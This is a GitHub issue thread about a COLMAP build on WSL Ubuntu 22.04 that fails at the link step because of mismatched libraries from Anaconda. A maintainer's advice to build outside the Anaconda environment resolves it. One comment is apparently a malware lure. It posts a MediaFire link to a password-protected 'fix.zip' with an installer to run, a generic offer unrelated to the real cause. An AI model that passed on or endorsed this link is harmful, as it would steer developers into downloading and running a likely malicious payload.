### ISSUE TITLE
issues about build colmap on ubantu 22.04, the error is  "collect2: error: ld returned 1 exit status ninja: build stopped: subcommand failed."

### ISSUE THREAD

**Issue by MajorTom0319** [colmap/colmap#2738]
could anyone help me to fix this error?

i install colmap on WSL, ubantu 22.04, and when i built ninja, This error is shown as follow:

-- Generating done
-- Build files have been written to: /home/majortom/majortom/colmap/build
[156/156] Linking CXX executable src/colmap/exe/colmap
FAILED: src/colmap/exe/colmap 
: && /usr/bin/g++-10 -Wno-maybe-uninitialized -Wall -O3 -DNDEBUG  src/colmap/exe/CMakeFiles/colmap_main.dir/feature.cc.o src/colmap/exe/CMakeFiles/colmap_main.dir/sfm.cc.o src/colmap/exe/CMakeFiles/colmap_main.dir/colmap.cc.o src/colmap/exe/CMakeFiles/colmap_main.dir/database.cc.o src/colmap/exe/CMakeFiles/colmap_main.dir/gui.cc.o src/colmap/exe/CMakeFiles/colmap_main.dir/image.cc.o src/colmap/exe/CMakeFiles/colmap_main.dir/model.cc.o src/colmap/exe/CMakeFiles/colmap_main.dir/mvs.cc.o src/colmap/exe/CMakeFiles/colmap_main.dir/vocab_tree.cc.o -o src/colmap/exe/colmap -L/home/majortom/anaconda3/lib   -L/usr/local/cuda-11.8/targets/x86_64-linux/lib/stubs   -L/usr/local/cuda-11.8/targets/x86_64-linux/lib -Wl,-rpath,/home/majortom/anaconda3/lib:/usr/local/cuda-11.8/lib64:  src/colmap/controllers/libcolmap_controllers.a  src/colmap/retrieval/libcolmap_retrieval.a  src/colmap/scene/libcolmap_scene.a  src/colmap/sfm/libcolmap_sfm.a  src/colmap/util/libcolmap_util.a  src/colmap/util/libcolmap_util_cuda.a  src/colmap/mvs/libcolmap_mvs_cuda.a  src/colmap/ui/libcolmap_ui.a  src/colmap/util/libcolmap_util_cuda.a  src/colmap/controllers/libcolmap_controllers.a  src/colmap/sfm/libcolmap_sfm.a  src/colmap/mvs/libcolmap_mvs.a  src/thirdparty/PoissonRecon/libcolmap_poisson_recon.a  /usr/lib/x86_64-linux-gnu/libgmpxx.so  /usr/lib/x86_64-linux-gnu/libmpfr.so  /usr/lib/x86_64-linux-gnu/libgmp.so  src/colmap/feature/libcolmap_feature.a  src/colmap/retrieval/libcolmap_retrieval.a  src/colmap/estimators/libcolmap_estimators.a  src/colmap/optim/libcolmap_optim.a  /usr/lib/x86_64-linux-gnu/libflann.so  /usr/lib/x86_64-linux-gnu/liblz4.so  src/thirdparty/SiftGPU/libcolmap_sift_gpu.a  /usr/local/cuda-11.8/lib64/libcudart.so  /usr/local/cuda-11.8/lib64/libcurand.so  /usr/lib/x86_64-linux-gnu/libGLEW.so  /home/majortom/anaconda3/lib/libboost_program_options.so.1.82.0  src/colmap/image/libcolmap_image.a  src/colmap/scene/libcolmap_scene.a  src/colmap/geometry/libcolmap_geometry.a  src/colmap/math/libcolmap_math.a  /usr/lib/x86_64-linux-gnu/libmetis.so  /home/majortom/anaconda3/lib/libboost_graph.so.1.82.0  /home/majortom/anaconda3/lib/libboost_regex.so.1.82.0  src/colmap/feature/libcolmap_feature_types.a  src/colmap/sensor/libcolmap_sensor.a  src/colmap/util/libcolmap_util.a  /home/majortom/anaconda3/lib/libboost_filesystem.so.1.82.0  /home/majortom/anaconda3/lib/libboost_atomic.so.1.82.0  /usr/lib/x86_64-linux-gnu/libsqlite3.so  /usr/lib/x86_64-linux-gnu/libGL.so  /usr/lib/libceres.so.2.0.0  /home/majortom/anaconda3/lib/libglog.so.0.5.0  /home/majortom/anaconda3/lib/libgflags.so.2.2.2  -lpthread  src/thirdparty/VLFeat/libcolmap_vlfeat.a  /usr/lib/gcc/x86_64-linux-gnu/10/libgomp.so  /usr/lib/x86_64-linux-gnu/libpthread.a  /usr/lib/x86_64-linux-gnu/libfreeimage.so  src/thirdparty/LSD/libcolmap_lsd.a  /home/majortom/anaconda3/lib/libQt5OpenGL.so.5.15.2  /home/majortom/anaconda3/lib/libQt5Widgets.so.5.15.2  /home/majortom/anaconda3/lib/libQt5Gui.so.5.15.2  /home/majortom/anaconda3/lib/libQt5Core.so.5.15.2  -lcudadevrt  -lcudart_static  -lrt  -lpthread  -ldl && :
/usr/bin/ld: /usr/lib/x86_64-linux-gnu/libfreeimage.so: undefined reference to `TIFFFieldTag@LIBTIFF_4.0'
/usr/bin/ld: /usr/lib/x86_64-linux-gnu/libfreeimage.so: undefined reference to `TIFFFieldName@LIBTIFF_4.0'
/usr/bin/ld: /usr/lib/x86_64-linux-gnu/libfreeimage.so: undefined reference to `TIFFFieldReadCount@LIBTIFF_4.0'
/usr/bin/ld: /usr/lib/x86_64-linux-gnu/libfreeimage.so: undefined reference to `TIFFFieldPassCount@LIBTIFF_4.0'
/usr/bin/ld: /usr/lib/x86_64-linux-gnu/libfreeimage.so: undefined reference to `TIFFFieldDataType@LIBTIFF_4.0'
/usr/bin/ld: /usr/lib/x86_64-linux-gnu/libfreeimage.so: undefined reference to `_TIFFDataSize@LIBTIFF_4.0'
/usr/bin/ld: /usr/lib/libceres.so.2.0.0: undefined reference to `google::kLogSiteUninitialized'
collect2: error: ld returned 1 exit status
ninja: build stopped: subcommand failed.

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ahojnnes** [comment]
Make sure you configure and compile from a consistent dev environment. It seems you are using anaconda. You probably want to start from a clean build folder and make sure you are not in a virtual anaconda environment.

**Comment by MajorTom0319** [comment]
thanks for your advise.
I have temporarily modified the name of anaconda, and it works
